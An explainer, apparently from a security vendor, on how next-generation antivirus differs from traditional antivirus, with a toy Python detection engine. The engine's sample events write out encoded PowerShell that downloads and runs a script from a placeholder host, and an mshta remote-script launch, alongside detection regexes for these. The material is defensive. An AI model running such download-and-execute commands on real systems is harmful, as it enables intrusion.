Next-generation antivirus (NGAV) is a step forward from traditional antivirus (AV). It keeps known, signature-based prevention and combines it with behavioral analysis and with models built using artificial intelligence (AI) and/or machine learning (ML), and it commonly feeds and draws on extended detection and response (XDR) capabilities. By correlating alerts from multiple telemetry sources with advanced analytics, NGAV surfaces actionable threat intelligence so that threats can be anticipated and prevented faster.
NGAV is usually delivered as a lightweight endpoint agent managed from a cloud console. It has a smaller performance impact on systems and endpoints than traditional on-premises AV, and it is increasingly the more common type of AV in organizations and enterprises.
In a sense, when XDR and NGAV work together they both protect the network perimeter and extend threat detection beyond it. Endpoint detection and response (EDR) operates on the endpoint itself, inside that perimeter. Attackers can still find a way onto an endpoint such as a phone or laptop, so a good EDR solution is the last line of defense there.
Again, it's the broad versus the specific here. As mentioned above, a modern NGAV solution is designed to use advanced analytics to secure, anticipate, and defend against threats at and beyond the network perimeter. Anti-malware solutions, by contrast, are primarily designed to scan individual systems for malware, including malware built to bypass security controls.
NGAV works by detecting and preventing both file-based malware and fileless attacks. It applies pre-execution analysis (inspecting a file or command before it is allowed to run) to block the tactics, techniques, and procedures (TTPs) and malicious behavior that attackers use deliberately and that a properly credentialed user may trigger unwittingly, for example by opening a malicious attachment. Let's take a closer look at how an NGAV solution accomplishes its detection and prevention goals:
Providers of NGAV solutions and services typically design the technology to deploy rapidly and to run without hindering the performance of network systems or endpoints.
When we talk about NGAV, the last two letters still loom large. The term “antivirus” has been part of computing for decades, so it bears asking: what exactly are the differences between modern NGAV and the traditional perception of AV?
Traditional AV focuses primarily on protecting a single endpoint. When that endpoint is compromised, the usual remedy is to quarantine or pull the affected device, and if that device is part of a larger critical system, doing so can disrupt unaffected devices that depend on it. This can leave a business with significant financial and reputational damage.
NGAV moves beyond these traditional AV processes, blocking a diverse range of attacks, including fileless malware, across the entire endpoint estate. Its main goal is to detect and stop attacks before they reach critical endpoints anywhere on the network. Via ML and AI, it can also recognize and halt evasive actions. More detection technology alone won't solve the problem of malware and other threats; smarter detection focused on prevention is what puts attackers on the defensive.
One last key difference is the previously mentioned concept of learning. Traditional AV is static: it matches whatever is in its signature database at the time of its last update and cannot adapt to a system's unique behaviors. NGAV, on the other hand, can learn from past behavior of the endpoints, systems, and networks on which it is installed. This is why it is better at detecting evasive actions and at blocking threats much earlier in the kill chain than was previously possible.
The benefits of NGAV over traditional AV are numerous, and it can accelerate an organization's broader detection and response (D&R) program.
For businesses and security organizations to stand against modern threats, they must outpace attackers' use of evasion techniques designed to thwart NGAV. That means blocking known and unknown threats earlier in the kill chain, cutting off endpoint and deep-system access, or even preventing network access entirely. Traditional AV typically relies on signature-based detection alone, whereas NGAV combines signature-based detection with AI and ML to surface the TTPs used by today's attackers.
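The two detection layers described above (pre-execution signature matching in the paragraph on how NGAV works, and signature-plus-behavior detection of fileless TTPs in the paragraph just above) can be shown together in a small engine. The following Python is an added example written for this page; it is not Rapid7's code or any product's detection logic. The known-bad hash, the rule names, the process-creation events, and the `example.invalid` URLs are all constructed for the illustration, and the behavioral rules are deliberately simplified versions of common patterns (an Office application spawning a script host, encoded PowerShell that decodes to download-and-execute, a LOLBin fetching a remote script).

```python
"""Toy NGAV-style engine: signature (hash) checks plus behavioral rules over
process-creation telemetry. Added example, not Rapid7 code; all data constructed."""
import base64
import hashlib
import re

# Signature layer: SHA-256 of known-bad files. Constructed for this example.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(b"constructed malicious payload bytes").hexdigest(): "Trojan.Constructed.A",
}

# Behavioral layer: file-agnostic rules, so they also fire on fileless chains.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_EXEC = re.compile(r"(IEX|Invoke-Expression|DownloadString|FromBase64String|Net\.WebClient)", re.I)


def decode_powershell(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def scan_event(event):
    """Evaluate one process-creation event; return a list of (rule, severity) hits."""
    hits = []
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    cmd = event.get("cmdline", "")

    # 1. Pre-execution signature check on the on-disk image, when its bytes are available.
    if "image_bytes" in event:
        digest = hashlib.sha256(event["image_bytes"]).hexdigest()
        if digest in KNOWN_BAD_SHA256:
            hits.append((f"signature:{KNOWN_BAD_SHA256[digest]}", "critical"))

    # 2. Office application spawning a script host: classic macro / fileless foothold.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append(("behavior:office_spawns_script_host", "high"))

    # 3. Encoded PowerShell; escalate when the decoded script contains download/exec primitives.
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_powershell(cmd)
        if decoded and DOWNLOAD_EXEC.search(decoded):
            hits.append(("behavior:encoded_powershell_download_exec", "high"))
        elif decoded:
            hits.append(("behavior:encoded_powershell", "medium"))

    # 4. LOLBin proxy execution pulling a remote script.
    if image in {"mshta.exe", "regsvr32.exe"} and re.search(r"https?://", cmd, re.I):
        hits.append(("behavior:lolbin_remote_script", "high"))
    return hits


def verdict(hits):
    """Collapse rule hits into a single pre-execution decision."""
    severities = {sev for _, sev in hits}
    if "critical" in severities or "high" in severities:
        return "block"
    if "medium" in severities:
        return "alert"
    return "allow"


def encode_ps(script):
    """Build an -EncodedCommand blob the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample telemetry: known-bad binary, fileless macro chain, benign admin command, LOLBin.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "invoice.exe", "cmdline": "invoice.exe",
     "image_bytes": b"constructed malicious payload bytes"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")},
    {"parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe -Command Get-Service"},
    {"parent": "explorer.exe", "image": "mshta.exe", "cmdline": "mshta.exe http://example.invalid/x.hta"},
]


def scan_all(events=SAMPLE_EVENTS):
    """Return (image, verdict, [rule names]) for every event."""
    results = []
    for e in events:
        hits = scan_event(e)
        results.append((e["image"], verdict(hits), [rule for rule, _ in hits]))
    return results


if __name__ == "__main__":
    for image, decision, rules in scan_all():
        print(f"{image:15} {decision:6} {rules}")
```

The point of the example is the second event: no file is written, so the signature layer has nothing to hash, yet the parent/child relationship and the decoded command line are enough to block it before execution. The third event shows the same script host used benignly and allowed, which is why behavioral rules key on context rather than on the image name alone.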
As previously mentioned, ML and AI give NGAV solutions the ability to adapt to the specific behaviors of the systems they protect. This helps analysts gain a deeper understanding of their endpoints and network systems so they can defend against threats and design better protections based on telemetry that may indicate an impending attack.
NGAV solutions are generally designed as lightweight, add-on technology that won't slow down system operations, and therefore won't slow down security personnel. They typically have a small footprint, deploy quickly, drive key insights, and enable a faster mean time to respond (MTTR) through actions such as automated asset and process containment.
With lower operational costs, more efficient threat intelligence and detection capabilities, and comprehensive coverage, NGAV solutions are typically a good fit for security teams looking to consolidate their tech stack. As a value-add for a detection and response (D&R) solution an organization already has, NGAV can help break down silos between security practices, which can be a productivity, efficiency, and growth driver for security operations centers (SOCs) that are already stretched thin.
As with any solution, and especially one in a category with the buzzy phrase “next gen” in its name, there are many options and potential vendors. So it's best to know how to find one that can tailor an NGAV solution to your unique environment.
Antivirus: Latest Rapid7 Blog Posts
Rapid7 Research: Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework